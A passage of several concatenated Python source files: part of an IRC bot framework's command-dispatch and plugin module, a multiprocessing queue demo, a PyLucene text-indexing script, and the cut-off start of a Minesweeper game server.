"A proxy object to allow proper nesting of commands (even threaded ones)."
_mores = ircutils.IrcDict()
def __init__(self, irc, msg, args, nested=0):
assert isinstance(args, list), 'Args should be a list, not a string.'
super(NestedCommandsIrcProxy, self).__init__(irc, msg)
self.nested = nested
self.repliedTo = False
if not self.nested and isinstance(irc, self.__class__):
# This means we were given an NestedCommandsIrcProxy instead of an
# irclib.Irc, and so we're obviously nested. But nested wasn't
# set! So we take our given Irc's nested value.
self.nested += irc.nested
maxNesting = conf.supybot.commands.nested.maximum()
if maxNesting and self.nested > maxNesting:
log.warning('%s attempted more than %s levels of nesting.',
self.msg.prefix, maxNesting)
self.error(_('You\'ve attempted more nesting than is '
'currently allowed on this bot.'))
return
# The deepcopy here is necessary for Scheduler; it re-runs already
# tokenized commands. There's a possibility a simple copy[:] would
# work, but we're being careful.
self.args = copy.deepcopy(args)
self.counter = 0
self._resetReplyAttributes()
if not args:
self.finalEvaled = True
self._callInvalidCommands()
else:
self.finalEvaled = False
world.commandsProcessed += 1
self.evalArgs()
def __eq__(self, other):
return other == self.getRealIrc()
def __hash__(self):
return hash(self.getRealIrc())
def _resetReplyAttributes(self):
self.to = None
self.action = None
self.notice = None
self.private = None
self.noLengthCheck = None
if self.msg.channel:
self.prefixNick = conf.get(conf.supybot.reply.withNickPrefix,
channel=self.msg.channel, network=self.irc.network)
else:
self.prefixNick = conf.supybot.reply.withNickPrefix()
def evalArgs(self, withClass=None):
while self.counter < len(self.args):
self.repliedTo = False
if isinstance(self.args[self.counter], minisix.string_types):
# If it's a string, just go to the next arg. There is no
# evaluation to be done for strings. If, at some point,
# we decided to, say, convert every string using
# ircutils.standardSubstitute, this would be where we would
# probably put it.
self.counter += 1
else:
assert isinstance(self.args[self.counter], list)
# It's a list. So we spawn another NestedCommandsIrcProxy
# to evaluate its args. When that class has finished
# evaluating its args, it will call our reply method, which
# will subsequently call this function again, and we'll
# pick up where we left off via self.counter.
cls = withClass or self.__class__
cls(self, self.msg, self.args[self.counter],
nested=self.nested+1)
# We have to return here because the new NestedCommandsIrcProxy
# might not have called our reply method instantly, since
# its command might be threaded. So (obviously) we can't
# just fall through to self.finalEval.
return
# Once all the list args are evaluated, we then evaluate our own
# list of args, since we're assured that they're all strings now.
assert all(lambda x: isinstance(x, minisix.string_types), self.args)
self.finalEval()
def _callInvalidCommands(self):
log.debug('Calling invalidCommands.')
threaded = False
cbs = []
for cb in self.irc.callbacks:
if hasattr(cb, 'invalidCommand'):
cbs.append(cb)
threaded = threaded or cb.threaded
def callInvalidCommands():
self.repliedTo = False
for cb in cbs:
log.debug('Calling %s.invalidCommand.', cb.name())
try:
cb.invalidCommand(self, self.msg, self.args)
except Error as e:
self.error(str(e))
except Exception as e:
log.exception('Uncaught exception in %s.invalidCommand.',
cb.name())
log.debug('Finished calling %s.invalidCommand.', cb.name())
if self.repliedTo:
log.debug('Done calling invalidCommands: %s.',cb.name())
return
if threaded:
name = 'Thread #%s (for invalidCommands)' % world.threadsSpawned
t = world.SupyThread(target=callInvalidCommands, name=name)
t.setDaemon(True)
t.start()
else:
callInvalidCommands()
def findCallbacksForArgs(self, args):
"""Returns a two-tuple of (command, plugins) that has the command
(a list of strings) and the plugins for which it was a command."""
assert isinstance(args, list)
args = list(map(canonicalName, args))
cbs = []
maxL = []
for cb in self.irc.callbacks:
if not hasattr(cb, 'getCommand'):
continue
L = cb.getCommand(args)
#log.debug('%s.getCommand(%r) returned %r', cb.name(), args, L)
if L and L >= maxL:
maxL = L
cbs.append((cb, L))
assert isinstance(L, list), \
'getCommand now returns a list, not a method.'
assert utils.iter.startswith(L, args), \
'getCommand must return a prefix of the args given. ' \
'(args given: %r, returned: %r)' % (args, L)
log.debug('findCallbacksForArgs: %r', cbs)
cbs = [cb for (cb, L) in cbs if L == maxL]
if len(maxL) == 1:
# Special case: one arg determines the callback. In this case, we
# have to check, in order:
# 1. Whether the arg is the same as the name of a callback. This
# callback would then win.
for cb in cbs:
if cb.canonicalName() == maxL[0]:
return (maxL, [cb])
# 2. Whether a defaultplugin is defined.
defaultPlugins = conf.supybot.commands.defaultPlugins
try:
defaultPlugin = defaultPlugins.get(maxL[0])()
log.debug('defaultPlugin: %r', defaultPlugin)
if defaultPlugin:
cb = self.irc.getCallback(defaultPlugin)
if cb in cbs:
# This is just a sanity check, but there's a small
# possibility that a default plugin for a command
# is configured to point to a plugin that doesn't
# actually have that command.
return (maxL, [cb])
except registry.NonExistentRegistryEntry:
pass
# 3. Whether an importantPlugin is one of the responses.
important = defaultPlugins.importantPlugins()
important = list(map(canonicalName, important))
importants = []
for cb in cbs:
if cb.canonicalName() in important:
importants.append(cb)
if len(importants) == 1:
return (maxL, importants)
return (maxL, cbs)
def finalEval(self):
# Now that we've already iterated through our args and made sure
# that any list of args was evaluated (by spawning another
# NestedCommandsIrcProxy to evaluated it into a string), we can finally
# evaluated our own list of arguments.
assert not self.finalEvaled, 'finalEval called twice.'
self.finalEvaled = True
# Now, the way we call a command is we iterate over the loaded pluings,
# asking each one if the list of args we have interests it. The
# way we do that is by calling getCommand on the plugin.
# The plugin will return a list of args which it considers to be
# "interesting." We will then give our args to the plugin which
# has the *longest* list. The reason we pick the longest list is
# that it seems reasonable that the longest the list, the more
# specific the command is. That is, given a list of length X, a list
# of length X+1 would be even more specific (assuming that both lists
# used the same prefix. Of course, if two plugins return a list of the
# same length, we'll just error out with a message about ambiguity.
(command, cbs) = self.findCallbacksForArgs(self.args)
if not cbs:
# We used to handle addressedRegexps here, but I think we'll let
# them handle themselves in getCommand. They can always just
# return the full list of args as their "command".
self._callInvalidCommands()
elif len(cbs) > 1:
names = sorted([cb.name() for cb in cbs])
command = formatCommand(command)
self.error(format(_('The command %q is available in the %L '
'plugins. Please specify the plugin '
'whose command you wish to call by using '
'its name as a command before %q.'),
command, names, command))
else:
cb = cbs[0]
args = self.args[len(command):]
if world.isMainThread() and \
(cb.threaded or conf.supybot.debug.threadAllCommands()):
t = CommandThread(target=cb._callCommand,
args=(command, self, self.msg, args))
t.start()
else:
cb._callCommand(command, self, self.msg, args)
def reply(self, s, noLengthCheck=False, prefixNick=None, action=None,
private=None, notice=None, to=None, msg=None,
sendImmediately=False, stripCtcp=True):
"""
Keyword arguments:
* `noLengthCheck=False`: True if the length shouldn't be checked
(used for 'more' handling)
* `prefixNick=True`: False if the nick shouldn't be prefixed to the
reply.
* `action=False`: True if the reply should be an action.
* `private=False`: True if the reply should be in private.
* `notice=False`: True if the reply should be noticed when the
bot is configured to do so.
* `to=<nick|channel>`: The nick or channel the reply should go to.
Defaults to msg.args[0] (or msg.nick if private)
* `sendImmediately=False`: True if the reply should use sendMsg() which
bypasses conf.supybot.protocols.irc.throttleTime
and gets sent before any queued messages
"""
# These use and or or based on whether or not they default to True or
# False. Those that default to True use and; those that default to
# False use or.
assert not isinstance(s, ircmsgs.IrcMsg), \
'Old code alert: there is no longer a "msg" argument to reply.'
self.repliedTo = True
if sendImmediately:
sendMsg = self.irc.sendMsg
else:
sendMsg = self.irc.queueMsg
if msg is None:
msg = self.msg
if prefixNick is not None:
self.prefixNick = prefixNick
if action is not None:
self.action = self.action or action
if action:
self.prefixNick = False
if notice is not None:
self.notice = self.notice or notice
if private is not None:
self.private = self.private or private
target = self._getTarget(to)
# action=True implies noLengthCheck=True and prefixNick=False
self.noLengthCheck=noLengthCheck or self.noLengthCheck or self.action
if not isinstance(s, minisix.string_types): # avoid trying to str() unicode
s = str(s) # Allow non-string esses.
if self.finalEvaled:
try:
if isinstance(self.irc, self.__class__):
s = s[:conf.supybot.reply.maximumLength()]
return self.irc.reply(s, to=self.to,
notice=self.notice,
action=self.action,
private=self.private,
prefixNick=self.prefixNick,
noLengthCheck=self.noLengthCheck,
stripCtcp=stripCtcp)
elif self.noLengthCheck:
# noLengthCheck only matters to NestedCommandsIrcProxy, so
# it's not used here. Just in case you were wondering.
m = _makeReply(self, msg, s, to=self.to,
notice=self.notice,
action=self.action,
private=self.private,
prefixNick=self.prefixNick,
stripCtcp=stripCtcp)
sendMsg(m)
return m
else:
s = ircutils.safeArgument(s)
allowedLength = conf.get(conf.supybot.reply.mores.length,
channel=target, network=self.irc.network)
if not allowedLength: # 0 indicates this.
allowedLength = (512
- len(':') - len(self.irc.prefix)
- len(' PRIVMSG ')
- len(target)
- len(' :')
- len('\r\n')
)
if self.prefixNick:
allowedLength -= len(msg.nick) + len(': ')
maximumMores = conf.get(conf.supybot.reply.mores.maximum,
channel=target, network=self.irc.network)
maximumLength = allowedLength * maximumMores
if len(s) > maximumLength:
log.warning('Truncating to %s bytes from %s bytes.',
maximumLength, len(s))
s = s[:maximumLength]
s_size = len(s.encode()) if minisix.PY3 else len(s)
if s_size <= allowedLength or \
not conf.get(conf.supybot.reply.mores,
channel=target, network=self.irc.network):
# There's no need for action=self.action here because
# action implies noLengthCheck, which has already been
# handled. Let's stick an assert in here just in case.
assert not self.action
m = _makeReply(self, msg, s, to=self.to,
notice=self.notice,
private=self.private,
prefixNick=self.prefixNick,
stripCtcp=stripCtcp)
sendMsg(m)
return m
# The '(XX more messages)' may have not the same
# length in the current locale
allowedLength -= len(_('(XX more messages)')) + 1 # bold
msgs = ircutils.wrap(s, allowedLength)
msgs.reverse()
instant = conf.get(conf.supybot.reply.mores.instant,
channel=target, network=self.irc.network)
while instant > 1 and msgs:
instant -= 1
response = msgs.pop()
m = _makeReply(self, msg, response, to=self.to,
notice=self.notice,
private=self.private,
prefixNick=self.prefixNick,
stripCtcp=stripCtcp)
sendMsg(m)
# XXX We should somehow allow these to be returned, but
# until someone complains, we'll be fine :) We
# can't return from here, though, for obvious
# reasons.
# return m
if not msgs:
return
response = msgs.pop()
if msgs:
if len(msgs) == 1:
more = _('more message')
else:
more = _('more messages')
n = ircutils.bold('(%i %s)' % (len(msgs), more))
response = '%s %s' % (response, n)
prefix = msg.prefix
if self.to and ircutils.isNick(self.to):
try:
state = self.getRealIrc().state
prefix = state.nickToHostmask(self.to)
except KeyError:
pass # We'll leave it as it is.
mask = prefix.split('!', 1)[1]
self._mores[mask] = msgs
public = bool(self.msg.channel)
private = self.private or not public
self._mores[msg.nick] = (private, msgs)
m = _makeReply(self, msg, response, to=self.to,
action=self.action,
notice=self.notice,
private=self.private,
prefixNick=self.prefixNick,
stripCtcp=stripCtcp)
sendMsg(m)
return m
finally:
self._resetReplyAttributes()
else:
if msg.ignored:
# Since the final reply string is constructed via
# ' '.join(self.args), the args index for ignored commands
# needs to be popped to avoid extra spaces in the final reply.
self.args.pop(self.counter)
msg.tag('ignored', False)
else:
self.args[self.counter] = s
self.evalArgs()
def noReply(self, msg=None):
if msg is None:
msg = self.msg
super(NestedCommandsIrcProxy, self).noReply(msg=msg)
if self.finalEvaled:
if isinstance(self.irc, NestedCommandsIrcProxy):
self.irc.noReply(msg=msg)
else:
msg.tag('ignored', True)
else:
self.args.pop(self.counter)
msg.tag('ignored', False)
self.evalArgs()
def replies(self, L, prefixer=None, joiner=None,
onlyPrefixFirst=False, to=None,
oneToOne=None, **kwargs):
if not self.finalEvaled and oneToOne is None:
oneToOne = True
return super(NestedCommandsIrcProxy, self).replies(L,
prefixer=prefixer, joiner=joiner,
onlyPrefixFirst=onlyPrefixFirst, to=to,
oneToOne=oneToOne, **kwargs)
def error(self, s='', Raise=False, **kwargs):
self.repliedTo = True
if Raise:
raise Error(s)
if not isinstance(self.irc, irclib.Irc):
return self.irc.error(s, **kwargs)
elif s:
m = _makeErrorReply(self, self.msg, s, **kwargs)
self.irc.queueMsg(m)
return m
def __getattr__(self, attr):
return getattr(self.irc, attr)
IrcObjectProxy = NestedCommandsIrcProxy
class CommandThread(world.SupyThread):
"""Just does some extra logging and error-recovery for commands that need
to run in threads.
"""
def __init__(self, target=None, args=(), kwargs={}):
self.command = args[0]
self.cb = target.__self__
threadName = 'Thread #%s (for %s.%s)' % (world.threadsSpawned,
self.cb.name(),
self.command)
log.debug('Spawning thread %s (args: %r)', threadName, args)
self.__parent = super(CommandThread, self)
self.__parent.__init__(target=target, name=threadName,
args=args, kwargs=kwargs)
self.setDaemon(True)
self.originalThreaded = self.cb.threaded
self.cb.threaded = True
def run(self):
try:
self.__parent.run()
finally:
self.cb.threaded = self.originalThreaded
class CommandProcess(world.SupyProcess):
"""Just does some extra logging and error-recovery for commands that need
to run in processes.
"""
def __init__(self, target=None, args=(), kwargs={}):
pn = kwargs.pop('pn', 'Unknown')
cn = kwargs.pop('cn', 'unknown')
procName = 'Process #%s (for %s.%s)' % (world.processesSpawned,
pn,
cn)
log.debug('Spawning process %s (args: %r)', procName, args)
self.__parent = super(CommandProcess, self)
self.__parent.__init__(target=target, name=procName,
args=args, kwargs=kwargs)
def run(self):
self.__parent.run()
class CanonicalString(registry.NormalizedString):
def normalize(self, s):
return canonicalName(s)
class CanonicalNameSet(utils.NormalizingSet):
def normalize(self, s):
return canonicalName(s)
class CanonicalNameDict(utils.InsensitivePreservingDict):
def key(self, s):
return canonicalName(s)
class Disabled(registry.SpaceSeparatedListOf):
sorted = True
Value = CanonicalString
List = CanonicalNameSet
conf.registerGlobalValue(conf.supybot.commands, 'disabled',
Disabled([], _("""Determines what commands are currently disabled. Such
commands will not appear in command lists, etc. They will appear not even
to exist.""")))
class DisabledCommands(object):
def __init__(self):
self.d = CanonicalNameDict()
for name in conf.supybot.commands.disabled():
if '.' in name:
(plugin, command) = name.split('.', 1)
if command in self.d:
if self.d[command] is not None:
self.d[command].add(plugin)
else:
self.d[command] = CanonicalNameSet([plugin])
else:
self.d[name] = None
def disabled(self, command, plugin=None):
if command in self.d:
if self.d[command] is None:
return True
elif plugin in self.d[command]:
return True
return False
def add(self, command, plugin=None):
if plugin is None:
self.d[command] = None
else:
if command in self.d:
if self.d[command] is not None:
self.d[command].add(plugin)
else:
self.d[command] = CanonicalNameSet([plugin])
def remove(self, command, plugin=None):
if plugin is None:
del self.d[command]
else:
if self.d[command] is not None:
self.d[command].remove(plugin)
class BasePlugin(object):
def __init__(self, *args, **kwargs):
self.cbs = []
for attr in dir(self):
if attr != canonicalName(attr):
continue
obj = getattr(self, attr)
if isinstance(obj, type) and issubclass(obj, BasePlugin):
cb = obj(*args, **kwargs)
setattr(self, attr, cb)
self.cbs.append(cb)
cb.log = log.getPluginLogger('%s.%s' % (self.name(),cb.name()))
super(BasePlugin, self).__init__()
class MetaSynchronizedAndFirewalled(log.MetaFirewall, utils.python.MetaSynchronized):
pass
SynchronizedAndFirewalled = MetaSynchronizedAndFirewalled(
'SynchronizedAndFirewalled', (), {})
class Commands(BasePlugin, SynchronizedAndFirewalled):
__synchronized__ = (
'__call__',
'callCommand',
'invalidCommand',
)
# For a while, a comment stood here to say, "Eventually callCommand." But
# that's wrong, because we can't do generic error handling in this
# callCommand -- plugins need to be able to override callCommand and do
# error handling there (see the Web plugin for an example).
__firewalled__ = {'isCommand': None,
'_callCommand': None}
commandArgs = ['self', 'irc', 'msg', 'args']
# These must be class-scope, so all plugins use the same one.
_disabled = DisabledCommands()
pre_command_callbacks = []
def name(self):
return self.__class__.__name__
def canonicalName(self):
return canonicalName(self.name())
def isDisabled(self, command):
return self._disabled.disabled(command, self.name())
def isCommandMethod(self, name):
"""Returns whether a given method name is a command in this plugin."""
# This function is ugly, but I don't want users to call methods like
# doPrivmsg or __init__ or whatever, and this is good to stop them.
# Don't normalize this name: consider outFilter(self, irc, msg).
# name = canonicalName(name)
if self.isDisabled(name):
return False
if name != canonicalName(name):
return False
if hasattr(self, name):
method = getattr(self, name)
if inspect.ismethod(method):
code = method.__func__.__code__
return inspect.getargs(code)[0] == self.commandArgs
else:
return False
else:
return False
def isCommand(self, command):
"""Convenience, backwards-compatibility, semi-deprecated."""
if isinstance(command, minisix.string_types):
return self.isCommandMethod(command)
else:
# Since we're doing a little type dispatching here, let's not be
# too liberal.
assert isinstance(command, list)
return self.getCommand(command) == command
def getCommand(self, args, stripOwnName=True):
assert args == list(map(canonicalName, args))
first = args[0]
for cb in self.cbs:
if first == cb.canonicalName():
return cb.getCommand(args)
if first == self.canonicalName() and len(args) > 1 and \
stripOwnName:
ret = self.getCommand(args[1:], stripOwnName=False)
if ret:
return [first] + ret
if self.isCommandMethod(first):
return [first]
return []
def getCommandMethod(self, command):
"""Gets the given command from this plugin."""
#print '*** %s.getCommandMethod(%r)' % (self.name(), command)
assert not isinstance(command, minisix.string_types)
assert command == list(map(canonicalName, command))
assert self.getCommand(command) == command
for cb in self.cbs:
if command[0] == cb.canonicalName():
return cb.getCommandMethod(command)
if len(command) > 1:
assert command[0] == self.canonicalName()
return self.getCommandMethod(command[1:])
else:
method = getattr(self, command[0])
if inspect.ismethod(method):
code = method.__func__.__code__
if inspect.getargs(code)[0] == self.commandArgs:
return method
else:
raise AttributeError
def listCommands(self, pluginCommands=[]):
commands = set(pluginCommands)
for s in dir(self):
if self.isCommandMethod(s):
commands.add(s)
for cb in self.cbs:
name = cb.canonicalName()
for command in cb.listCommands():
if command == name:
commands.add(command)
else:
commands.add(' '.join([name, command]))
L = list(commands)
L.sort()
return L
def callCommand(self, command, irc, msg, *args, **kwargs):
# We run all callbacks before checking if one of them returned True
if any(bool, list(cb(self, command, irc, msg, *args, **kwargs)
for cb in self.pre_command_callbacks)):
return
method = self.getCommandMethod(command)
method(irc, msg, *args, **kwargs)
def _callCommand(self, command, irc, msg, *args, **kwargs):
if irc.nick == msg.args[0]:
self.log.info('%s called in private by %q.', formatCommand(command),
msg.prefix)
else:
self.log.info('%s called on %s by %q.', formatCommand(command),
msg.args[0], msg.prefix)
try:
if len(command) == 1 or command[0] != self.canonicalName():
fullCommandName = [self.canonicalName()] + command
else:
fullCommandName = command
# Let "P" be the plugin and "X Y" the command name. The
# fullCommandName is "P X Y"
# check "Y"
cap = checkCommandCapability(msg, self, command[-1])
if cap:
irc.errorNoCapability(cap)
return
# check "P", "P.X", and "P.X.Y"
prefix = []
for name in fullCommandName:
prefix.append(name)
cap = checkCommandCapability(msg, self, prefix)
if cap:
irc.errorNoCapability(cap)
return
try:
self.callingCommand = command
self.callCommand(command, irc, msg, *args, **kwargs)
finally:
self.callingCommand = None
except SilentError:
pass
except (getopt.GetoptError, ArgumentError) as e:
self.log.debug('Got %s, giving argument error.',
utils.exnToString(e))
help = self.getCommandHelp(command)
if 'command has no help.' in help:
# Note: this case will never happen, unless 'checkDoc' is set
# to False.
irc.error(_('Invalid arguments for %s.') % formatCommand(command))
else:
irc.reply(help)
except (SyntaxError, Error) as e:
self.log.debug('Error return: %s', utils.exnToString(e))
irc.error(str(e))
except Exception as e:
self.log.exception('Uncaught exception in %s.', command)
if conf.supybot.reply.error.detailed():
irc.error(utils.exnToString(e))
else:
irc.replyError(msg=msg)
def getCommandHelp(self, command, simpleSyntax=None):
method = self.getCommandMethod(command)
help = getHelp
chan = None
net = None
if dynamic.msg is not None:
chan = dynamic.msg.channel
if dynamic.irc is not None:
net = dynamic.irc.network
if simpleSyntax is None:
simpleSyntax = conf.get(conf.supybot.reply.showSimpleSyntax,
channel=chan, network=net)
if simpleSyntax:
help = getSyntax
if hasattr(method, '__doc__'):
return help(method, name=formatCommand(command))
else:
return format(_('The %q command has no help.'),
formatCommand(command))
class PluginMixin(BasePlugin, irclib.IrcCallback):
public = True
alwaysCall = ()
threaded = False
noIgnore = False
classModule = None
Proxy = NestedCommandsIrcProxy
def __init__(self, irc):
myName = self.name()
self.log = log.getPluginLogger(myName)
self.__parent = super(PluginMixin, self)
self.__parent.__init__(irc)
# We can't do this because of the specialness that Owner and Misc do.
# I guess plugin authors will have to get the capitalization right.
# self.callAfter = map(str.lower, self.callAfter)
# self.callBefore = map(str.lower, self.callBefore)
def canonicalName(self):
return canonicalName(self.name())
def __call__(self, irc, msg):
irc = SimpleProxy(irc, msg)
if msg.command == 'PRIVMSG':
if hasattr(self.noIgnore, '__call__'):
noIgnore = self.noIgnore(irc, msg)
else:
noIgnore = self.noIgnore
if noIgnore or \
not ircdb.checkIgnored(msg.prefix, msg.channel) or \
not ircutils.isUserHostmask(msg.prefix): # Some services impl.
self.__parent.__call__(irc, msg)
else:
self.__parent.__call__(irc, msg)
def registryValue(self, name, channel=None, network=None, value=True):
if isinstance(network, bool):
# Network-unaware plugin that uses 'value' as a positional
# argument.
(network, value) = (value, network)
plugin = self.name()
group = conf.supybot.plugins.get(plugin)
names = registry.split(name)
for name in names:
group = group.get(name)
if channel or network:
group = group.getSpecific(network=network, channel=channel)
if value:
return group()
else:
return group
def setRegistryValue(self, name, value, channel=None, network=None):
plugin = self.name()
group = conf.supybot.plugins.get(plugin)
names = registry.split(name)
for name in names:
group = group.get(name)
if network:
group = group.get(':' + network)
if channel:
group = group.get(channel)
group.setValue(value)
def userValue(self, name, prefixOrName, default=None):
try:
id = str(ircdb.users.getUserId(prefixOrName))
except KeyError:
return None
plugin = self.name()
group = conf.users.plugins.get(plugin)
names = registry.split(name)
for name in names:
group = group.get(name)
return group.get(id)()
def setUserValue(self, name, prefixOrName, value,
ignoreNoUser=True, setValue=True):
try:
id = str(ircdb.users.getUserId(prefixOrName))
except KeyError:
if ignoreNoUser:
return
else:
raise
plugin = self.name()
group = conf.users.plugins.get(plugin)
names = registry.split(name)
for name in names:
group = group.get(name)
group = group.get(id)
if setValue:
group.setValue(value)
else:
group.set(value)
def getPluginHelp(self):
if hasattr(self, '__doc__'):
return self.__doc__
else:
return None
class Plugin(PluginMixin, Commands):
pass
Privmsg = Plugin # Backwards compatibility.
class PluginRegexp(Plugin):
"""Same as Plugin, except allows the user to also include regexp-based
callbacks. All regexp-based callbacks must be specified in the set (or
list) attribute "regexps", "addressedRegexps", or "unaddressedRegexps"
depending on whether they should always be triggered, triggered only when
the bot is addressed, or triggered only when the bot isn't addressed.
"""
flags = re.I
regexps = ()
"""'regexps' methods are called whether the message is addressed or not."""
addressedRegexps = ()
"""'addressedRegexps' methods are called only when the message is addressed,
and then, only with the payload (i.e., what is returned from the
'addressed' function."""
unaddressedRegexps = ()
"""'unaddressedRegexps' methods are called only when the message is *not*
addressed."""
Proxy = SimpleProxy
def __init__(self, irc):
self.__parent = super(PluginRegexp, self)
self.__parent.__init__(irc)
self.res = []
self.addressedRes = []
self.unaddressedRes = []
for name in self.regexps:
method = getattr(self, name)
r = re.compile(method.__doc__, self.flags)
self.res.append((r, name))
for name in self.addressedRegexps:
method = getattr(self, name)
r = re.compile(method.__doc__, self.flags)
self.addressedRes.append((r, name))
for name in self.unaddressedRegexps:
method = getattr(self, name)
r = re.compile(method.__doc__, self.flags)
self.unaddressedRes.append((r, name))
def _callRegexp(self, name, irc, msg, m):
method = getattr(self, name)
try:
method(irc, msg, m)
except Error as e:
irc.error(str(e))
except Exception as e:
self.log.exception('Uncaught exception in _callRegexp:')
def invalidCommand(self, irc, msg, tokens):
s = ' '.join(tokens)
for (r, name) in self.addressedRes:
for m in r.finditer(s):
self._callRegexp(name, irc, msg, m)
def doPrivmsg(self, irc, msg):
if msg.isError:
return
proxy = self.Proxy(irc, msg)
if not msg.addressed:
for (r, name) in self.unaddressedRes:
for m in r.finditer(msg.args[1]):
self._callRegexp(name, proxy, msg, m)
for (r, name) in self.res:
for m in r.finditer(msg.args[1]):
self._callRegexp(name, proxy, msg, m)
PrivmsgCommandAndRegexp = PluginRegexp
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
multiprocess.py
|
import time
import multiprocessing
from multiprocessing import Process, Queue, Manager
CPU_NUM = multiprocessing.cpu_count()
class Task():
def __init__(self, i):
self.num = i
def work(self, i):
while True:
time.sleep(2)
print('working: ', i)
def start(self):
self.proc = Process(target=self.work, args=(self.num,))
self.proc.start()
# taskList = []
# for i in range(CPU_NUM):
# task = Task(i)
# task.start()
# taskList.append(task)
container = Queue(maxsize=10)
def processPro(gvalue):
while True:
if container.full():
ele = container.get()
print('pro', ele)
current = time.time()
container.put(current)
gvalue['time'] = current
time.sleep(0.1)
def processCon(gvalue, no):
while True:
ele = container.get()
print(no, ele)
print("{no}, current: {current}".format(no=no, current=gvalue['time']))
time.sleep(1)
def main():
gValue = Manager().dict({'time': 0})
pro = Process(target=processPro, args=(gValue,))
pro.start()
for i in range(5):
pro = Process(target=processCon, args=(gValue, i))
pro.start()
while True:
print('main: ', gValue['time'])
time.sleep(2)
main()
|
IndexFiles.py
|
#!/usr/bin/env python
INDEX_DIR = "IndexFiles.index"
import sys, os, lucene, threading, time, re
from datetime import datetime
from java.io import File
from org.apache.lucene.analysis.miscellaneous import LimitTokenCountAnalyzer
from org.apache.lucene.analysis.standard import StandardAnalyzer
from org.apache.lucene.document import Document, Field, FieldType
from org.apache.lucene.index import FieldInfo, IndexWriter, IndexWriterConfig
from org.apache.lucene.store import SimpleFSDirectory
from org.apache.lucene.util import Version
"""
This class is loosely based on the Lucene (java implementation) demo class
org.apache.lucene.demo.IndexFiles. It will take a directory as an argument
and will index all of the files in that directory and downward recursively.
It will index on the file path, the file name and the file contents. The
resulting Lucene index will be placed in the current directory and called
'index'.
"""
class Ticker(object):
def __init__(self):
self.tick = True
def run(self):
while self.tick:
sys.stdout.write('.')
sys.stdout.flush()
time.sleep(1.0)
class IndexFiles(object):
"""Usage: python IndexFiles <doc_directory>"""
def __init__(self, root, storeDir, analyzer):
if not os.path.exists(storeDir):
os.mkdir(storeDir)
store = SimpleFSDirectory(File(storeDir))
analyzer = LimitTokenCountAnalyzer(analyzer, 1048576)
config = IndexWriterConfig(Version.LUCENE_CURRENT, analyzer)
config.setOpenMode(IndexWriterConfig.OpenMode.CREATE)
writer = IndexWriter(store, config)
self.indexDocs(root, writer)
ticker = Ticker()
print 'commit index',
threading.Thread(target=ticker.run).start()
writer.commit()
writer.close()
ticker.tick = False
print 'done'
def getTxtAttribute(self, contents, attr):
m = re.search(attr + ': (.*?)\n',contents)
if m:
return m.group(1)
else:
return ''
def indexDocs(self, root, writer):
#t1 = FieldType()
#t1.setIndexed(True)
#t1.setStored(True)
#t1.setTokenized(False)
#t1.setIndexOptions(FieldInfo.IndexOptions.DOCS_AND_FREQS)
#t2 = FieldType()
#t2.setIndexed(True)
#t2.setStored(False)
#t2.setTokenized(True)
#t2.setIndexOptions(FieldInfo.IndexOptions.DOCS_AND_FREQS_AND_POSITIONS)
for root, dirnames, filenames in os.walk(root):
for filename in filenames:
if not filename.endswith('.txt'):
continue
print "adding", filename
try:
path = os.path.join(root, filename)
file = open(path)
contents = file.read().decode('utf8', 'ignore')
file.close()
doc = Document()
doc.add(Field("name", filename,
Field.Store.YES,
Field.Index.NOT_ANALYZED))
doc.add(Field("path", path,
Field.Store.YES,
Field.Index.NOT_ANALYZED))
if len(contents) > 0:
title = self.getTxtAttribute(contents, 'Title')
author = self.getTxtAttribute(contents, 'Author')
language = self.getTxtAttribute(contents, 'Language')
doc.add(Field("title", title,
Field.Store.YES,
Field.Index.ANALYZED))
doc.add(Field("author", author,
Field.Store.YES,
Field.Index.ANALYZED))
doc.add(Field("language", language,
Field.Store.YES,
Field.Index.ANALYZED))
doc.add(Field("contents", contents,
Field.Store.NO,
Field.Index.ANALYZED))
else:
print "warning: no content in %s" % filename
writer.addDocument(doc)
except Exception, e:
print "Failed in indexDocs:", e
if __name__ == '__main__':
"""
if len(sys.argv) < 2:
print IndexFiles.__doc__
sys.exit(1)
"""
lucene.initVM(vmargs=['-Djava.awt.headless=true'])
print 'lucene', lucene.VERSION
start = datetime.now()
try:
"""
base_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
IndexFiles(sys.argv[1], os.path.join(base_dir, INDEX_DIR),
StandardAnalyzer(Version.LUCENE_CURRENT))
"""
analyzer = StandardAnalyzer(Version.LUCENE_CURRENT)
IndexFiles('testfolder', "index", analyzer)
end = datetime.now()
print end - start
except Exception, e:
print "Failed: ", e
raise e
|
MineSweeperServer.py
|
import socket
import threading
import time
import random
import operator
Players=[]
stop = False
timer = 1
playerNum = 0
score = 0
playerScores = {}
echo_queue = []
minecoord = []
neighborCoord = []
status = ''
neighbor = []
checkcoord = []
NeighborMines = []
up_right, up_left, up, left, right, down_left, down_right, down = [], [], [], [] ,[] ,[] ,[] ,[]
removedcoord = []
#Generate random mines as put into neighbormines and minecoord lists
for i in range(0, 40):
x = random.randrange(1, 17)
y = random.randrange(1, 17)
coord = x, y
neighborCoord.append(coord)
minecoord.append(str(x) + ',' + str(y))
#Keep track of score for each player
def scoreKeeper(playerNum, score):
global playerScores
playerScores = {playerNum:score}
print(playerScores)
#Check if the clicked coordinate are mines or not
def checkMine(clickcoord, neighborCoord):
if ':' not in clickcoord:
clickcoord = clickcoord.split(',')
x = clickcoord[0]
x = int(x)
y = clickcoord[1]
y = int(y)
up_right = x + 1, y + 1
checkcoord.append(up_right)
up_left = x -1, y + 1
checkcoord.append(up_left)
up = x, y + 1
checkcoord.append(up)
left = x - 1, y
checkcoord.append(left)
right = x + 1, y
checkcoord.append(right)
down_right = x + 1, y - 1
checkcoord.append(down_right)
down_left = x - 1, y - 1
checkcoord.append(down_left)
down = x, y - 1
checkcoord.append(down)
NeighborMines = set(neighborCoord).intersection(checkcoord)
del checkcoord[:] #Erase the surrounding coordinates for the next click coordinates
return(NeighborMines)
#Recieve packets from each minesweeper client
def clientecho (sock, score, playerNum):
global removedcoord
global minecoord
while True:
data = sock.recv(4096)
clickcoord = data.decode()
clickcoord = str(clickcoord)
if 'I WIN!' in clickcoord:
print('last mine')
print('game over')
Winner = '1'
print('Player ' + Winner + ' won!')
status = 'Winner'
else:
SendNeighbors = checkMine(clickcoord, neighborCoord)
# ':' determines whether or not a flag should be used
if ':' not in clickcoord:
if any(x in clickcoord for x in removedcoord):
status = 'used'
elif any(x in clickcoord for x in minecoord):
removedcoord.append(str(clickcoord))
if clickcoord in minecoord:
